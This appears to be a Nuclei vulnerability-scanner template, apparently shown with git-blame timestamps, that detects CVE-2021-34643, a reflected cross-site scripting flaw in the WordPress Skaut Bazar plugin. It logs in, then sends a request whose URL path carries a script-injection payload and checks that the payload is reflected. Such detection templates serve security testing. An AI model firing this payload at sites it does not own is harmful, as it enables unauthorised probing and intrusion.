2022-02-04 19:20:43 +00:00
id : CVE-2021-34643
info :
2022-08-29 13:55:23 +00:00
name : WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting
2022-02-04 19:20:43 +00:00
author : dhiyaneshDK
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.
2022-02-04 19:20:43 +00:00
reference :
- https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643
- https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-34643
2022-02-04 19:20:43 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-04 19:20:43 +00:00
cve-id : CVE-2021-34643
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wpscan,wordpress,cve,cve2021,wp-plugin,authenticated
2022-02-04 19:20:43 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
2022-02-08 18:20:44 +00:00
2022-02-04 19:20:43 +00:00
- |
2022-02-08 18:20:44 +00:00
GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1
2022-02-04 19:20:43 +00:00
Host : {{Hostname}}
2022-02-08 18:20:44 +00:00
cookie-reuse : true
2022-02-04 19:20:43 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-02-08 18:20:44 +00:00
words :
- "</script><script>alert(document.domain)</script>"
2022-02-04 19:20:43 +00:00
- type : status
status :
- 200
- type : word
2022-02-08 18:20:44 +00:00
part : header
2022-02-04 19:20:43 +00:00
words :
- "text/html"
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28